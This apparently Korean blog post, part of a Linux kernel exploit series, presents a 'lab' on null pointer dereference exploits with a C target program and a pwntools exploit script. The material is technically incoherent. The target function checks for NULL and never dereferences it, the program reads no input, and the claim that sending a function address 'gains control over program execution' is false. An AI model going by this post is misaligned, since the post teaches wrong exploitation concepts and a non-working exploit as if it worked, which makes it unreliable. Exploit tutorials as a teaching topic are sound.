strangerRidingCaml
8. Null Pointer Dereference Exploits 본문
728x90
Null Pointer Dereference Exploits
Null pointer dereference exploits occur when a program attempts to access or manipulate memory using a null pointer, resulting in a segmentation fault or allowing an attacker to control program execution.
Lab Activity: Null Pointer Dereference Exploit
In this lab activity, we'll demonstrate a simple null pointer dereference exploit on a vulnerable C program.
Defender Side Code:
#include <stdio.h>
#include <stdlib.h>
void vulnerable_function(int *ptr) {
if (ptr != NULL) {
*ptr = 42; // Write to the memory location pointed to by ptr
}
}
int main() {
int *ptr = NULL; // Initialize pointer to NULL
vulnerable_function(ptr); // Call vulnerable function with null pointer
return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7 # Example address, adjust as necessary
# Payload to overwrite the return address with the address of the vulnerable function
payload = p64(vulnerable_function_addr)
# Establishing connection to the vulnerable program
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code constructs a payload with the address of the vulnerable function. It establishes a connection to the vulnerable program, sends the payload, and gains control over program execution upon successful exploitation.
'Linux kernel exploit' 카테고리의 다른 글
10. Return-to-Direct-Mapped Memory (ret2dir) Attacks (0) | 2024.05.12 |
---|---|
9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct) (0) | 2024.05.12 |
7. Write-What-Where (Arbitrary Memory Overwrite) (0) | 2024.05.12 |
6. Return-Oriented Programming (ROP) (0) | 2024.05.12 |
5. Return-to-User (ret2usr) Attacks (0) | 2024.05.12 |